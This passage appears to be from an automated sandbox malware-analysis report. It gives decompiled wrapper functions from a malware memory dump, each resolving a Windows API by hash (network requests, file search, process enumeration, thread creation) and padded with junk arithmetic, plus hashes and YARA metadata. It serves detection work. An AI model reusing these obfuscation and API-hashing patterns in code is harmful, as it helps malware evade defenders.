                                          • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                          • Instruction Fuzzy Hash: 45015AB1C0120CFBDB04EFA4C94A9EEBFB4EF41314F108189E8086B251D3B54B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E006F595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E007007A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}








                                          0x006f595d
                                          0x006f595e
                                          0x006f5960
                                          0x006f5963
                                          0x006f5965
                                          0x006f5968
                                          0x006f5969
                                          0x006f596a
                                          0x006f596f
                                          0x006f5979
                                          0x006f5982
                                          0x006f5989
                                          0x006f5990
                                          0x006f5997
                                          0x006f599e
                                          0x006f59a2
                                          0x006f59a9
                                          0x006f59c2
                                          0x006f59ce
                                          0x006f59d4

                                          APIs
                                          • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 006F59CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileFindNext
                                          • String ID: 4
                                          • API String ID: 2029273394-293933855
                                          • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                          • Instruction ID: 9386a35c7849b9afea5ea55fe5569f338665ad6af7dbcd7d48f1d879135b4d22
                                          • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                          • Instruction Fuzzy Hash: 5C014B76D01208FBEB14DFA4C84A8DEBE78EF41354F108188F80867250D7B65F249B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00704F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00704F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E007007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00704f80
                                          0x00704f81
                                          0x00704f82
                                          0x00704f86
                                          0x00704f87
                                          0x00704f8c
                                          0x00704fa5
                                          0x00704fa8
                                          0x00704faf
                                          0x00704fb6
                                          0x00704fc7
                                          0x00704fca
                                          0x00704fd7
                                          0x00704fe2
                                          0x00704fe7

                                          APIs
                                          • CloseHandle.KERNEL32(003E66D8), ref: 00704FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                          • Instruction ID: 8aae62e17bd9586afd767884eb545bb771224710aee2626a314b92568e48ad66
                                          • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                          • Instruction Fuzzy Hash: 94F037B081120CFFDF04DFA4DA4689EBFBAEB41310F208299E804AB250D3715B509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00707955, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E00707955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E006F602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E007007A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}










                                          0x0070795d
                                          0x00707962
                                          0x00707964
                                          0x00707965
                                          0x0070796b
                                          0x0070796c
                                          0x0070796f
                                          0x00707972
                                          0x00707975
                                          0x00707978
                                          0x00707979
                                          0x0070797c
                                          0x0070797f
                                          0x00707980
                                          0x00707984
                                          0x00707985
                                          0x0070798a
                                          0x00707994
                                          0x007079a0
                                          0x007079a3
                                          0x007079ba
                                          0x007079c1
                                          0x007079c4
                                          0x007079cb
                                          0x007079d2
                                          0x007079d6
                                          0x007079dd
                                          0x007079e4
                                          0x007079f1
                                          0x00707a07
                                          0x00707a0e

                                          APIs
                                          • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00707A07
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID:
                                          • API String ID: 3050416762-0
                                          • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                          • Instruction ID: f3e8e5b8db0181c7133055656fc65bc453a9655b10eca4700fda880ce90a7dec
                                          • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                          • Instruction Fuzzy Hash: 53211372800248BBCF119F92CD09CDFBFB9EF89718F108199F90566120D7719A60DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0070375D, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E0070375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E006F602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E007007A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}












                                          0x00703764
                                          0x00703769
                                          0x0070376a
                                          0x0070376d
                                          0x0070376e
                                          0x00703771
                                          0x00703774
                                          0x00703775
                                          0x00703778
                                          0x0070377b
                                          0x0070377e
                                          0x00703781
                                          0x00703782
                                          0x00703784
                                          0x00703785
                                          0x0070378a
                                          0x00703794
                                          0x0070379d
                                          0x007037a0
                                          0x007037a3
                                          0x007037aa
                                          0x007037b1
                                          0x007037b8
                                          0x007037bf
                                          0x007037c6
                                          0x007037d2
                                          0x007037da
                                          0x007037e2
                                          0x007037f6
                                          0x0070380a
                                          0x00703810

                                          APIs
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0070380A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InformationVolume
                                          • String ID:
                                          • API String ID: 2039140958-0
                                          • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                          • Instruction ID: 07c422d10f05483433b4c935fac93bba4b79f1fc963eb2d513c1af9277761eac
                                          • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                          • Instruction Fuzzy Hash: F41129B1802219BBCF55DF95DD098DF7FB9EF4A360F104148F90862160C7B14A64DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006FB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E006FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E007007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x006fb569
                                          0x006fb56a
                                          0x006fb56d
                                          0x006fb572
                                          0x006fb574
                                          0x006fb577
                                          0x006fb57a
                                          0x006fb57d
                                          0x006fb580
                                          0x006fb583
                                          0x006fb586
                                          0x006fb587
                                          0x006fb58a
                                          0x006fb58d
                                          0x006fb590
                                          0x006fb593
                                          0x006fb594
                                          0x006fb595
                                          0x006fb59a
                                          0x006fb5a4
                                          0x006fb5b8
                                          0x006fb5c0
                                          0x006fb5c4
                                          0x006fb5cb
                                          0x006fb5d2
                                          0x006fb5d9
                                          0x006fb5e6
                                          0x006fb5fd
                                          0x006fb604

                                          APIs
                                          • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 006FB5FD
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                          • Instruction ID: 45cee30b9e7ae41b342cf837d0c8a9aa609397758199f8df1757f54c9cee0e0d
                                          • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                          • Instruction Fuzzy Hash: 2F11B272801248FBDF56DF95DD06CEE7FBAEF89314F148198FA1862160D3769A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007036D3, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E007036D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E006F602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E007007A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}













                                          0x007036df
                                          0x007036e1
                                          0x007036e8
                                          0x007036ed
                                          0x007036fc
                                          0x00703701
                                          0x00703702
                                          0x00703709
                                          0x0070370a
                                          0x00703711
                                          0x0070371b
                                          0x00703723
                                          0x0070372f
                                          0x00703736
                                          0x0070373d
                                          0x0070374a
                                          0x00703754
                                          0x0070375c

                                          APIs
                                          • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00703754
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessSession
                                          • String ID:
                                          • API String ID: 3779259828-0
                                          • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                          • Instruction ID: 2b587c93d054544a4faecb214f2869b3e510d0e865085207b14ba78e16e97eae
                                          • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                          • Instruction Fuzzy Hash: DC01D271A00208FBEB04DBA8DC4A9EFBFB4EF84364F208089EA04A7251D7751F1087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F1132, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E006F1132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E006F602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E007007A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}







                                          0x006f1135
                                          0x006f1136
                                          0x006f113a
                                          0x006f113b
                                          0x006f113e
                                          0x006f1141
                                          0x006f1144
                                          0x006f1147
                                          0x006f114a
                                          0x006f114b
                                          0x006f114e
                                          0x006f114f
                                          0x006f1150
                                          0x006f1151
                                          0x006f1156
                                          0x006f116f
                                          0x006f1172
                                          0x006f1179
                                          0x006f1180
                                          0x006f1187
                                          0x006f118e
                                          0x006f1192
                                          0x006f1195
                                          0x006f11a8
                                          0x006f11ba
                                          0x006f11c0

                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 006F11BA
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                          • Instruction ID: 099d28402a32e6d61cc6b2863a37fa5580d55d31eb66abb3d5bc50cefcc6671c
                                          • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                          • Instruction Fuzzy Hash: 2D01F77290221DBBCF15DFA5DD49CDFBFB9EF09254F104188FA0962250D2769A60DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00708422, Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00708422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E007007A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}











                                          0x00708428
                                          0x0070842b
                                          0x0070842e
                                          0x00708430
                                          0x00708433
                                          0x00708436
                                          0x00708439
                                          0x0070843d
                                          0x0070843e
                                          0x00708443
                                          0x0070844a
                                          0x00708453
                                          0x0070845a
                                          0x00708461
                                          0x00708468
                                          0x0070847c
                                          0x0070847f
                                          0x00708486
                                          0x0070848d
                                          0x00708498
                                          0x0070849b
                                          0x007084a8
                                          0x007084be
                                          0x007084c3

                                          APIs
                                          • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 007084BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID:
                                          • API String ID: 360639707-0
                                          • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                          • Instruction ID: e11ebea158a2dca67859d0c0ac914c47bafd019334429a283cd549e2f1556e3d
                                          • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                          • Instruction Fuzzy Hash: A81116B180120DFFCF05DF94CD469AEBFB6AB44314F208288F924662A1C3768B249B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0070981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0070981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E007007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00709821
                                          0x00709822
                                          0x00709825
                                          0x00709828
                                          0x0070982a
                                          0x0070982c
                                          0x0070982f
                                          0x00709832
                                          0x00709835
                                          0x00709836
                                          0x00709837
                                          0x0070983c
                                          0x00709855
                                          0x00709858
                                          0x0070985f
                                          0x00709866
                                          0x0070986d
                                          0x00709874
                                          0x0070987b
                                          0x0070988e
                                          0x0070989b
                                          0x007098a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,006F87F2,0000CAAE,0000510C,AD82F196), ref: 0070989B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                          • Instruction ID: 9c8c09317b007f7bd86bad20a98775aa15cd9fb6c1f63d776a9811ab922738d1
                                          • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                          • Instruction Fuzzy Hash: 05018872801208FBDB04EF95D8468DFBFB9EF85310F108188F908A6220E6715A219BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00709AC7, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E00709AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006F602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E007007A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}








                                          0x00709acc
                                          0x00709acf
                                          0x00709ad2
                                          0x00709ad7
                                          0x00709adf
                                          0x00709aed
                                          0x00709af5
                                          0x00709afd
                                          0x00709b01
                                          0x00709b08
                                          0x00709b0f
                                          0x00709b16
                                          0x00709b1d
                                          0x00709b31
                                          0x00709b3f
                                          0x00709b44

                                          APIs
                                          • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00709B3F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: NextProcess32
                                          • String ID:
                                          • API String ID: 1850201408-0
                                          • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                          • Instruction ID: 236eb1ac0cb3144f19bfb54ae0cee24200e9bd69f65b059ce104ef5c229cd7c2
                                          • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                          • Instruction Fuzzy Hash: EF014BB190020CFFEF04DFA4CD4A9AEBFB5EF45350F108198F609A6291D7B65B609B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006F7663, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006F7663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E006F602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E007007A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}








                                          0x006f7678
                                          0x006f767d
                                          0x006f7687
                                          0x006f7693
                                          0x006f769a
                                          0x006f76a1
                                          0x006f76a5
                                          0x006f76a9
                                          0x006f76c2
                                          0x006f76d5
                                          0x006f76da

                                          APIs
                                          • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,006F620E,00000000,?,?), ref: 006F76D5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FullImageNameProcessQuery
                                          • String ID:
                                          • API String ID: 3578328331-0
                                          • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                          • Instruction ID: 2fb84f990bc58842e4fbbf5e6811c75bea0710818c898c6cd44f19f997971163
                                          • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                          • Instruction Fuzzy Hash: C5011D7590020DFFEF059F90CC06EAE7FB5EF44754F10819CFA1566261D6729B609B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00709A56, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00709A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E006F602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
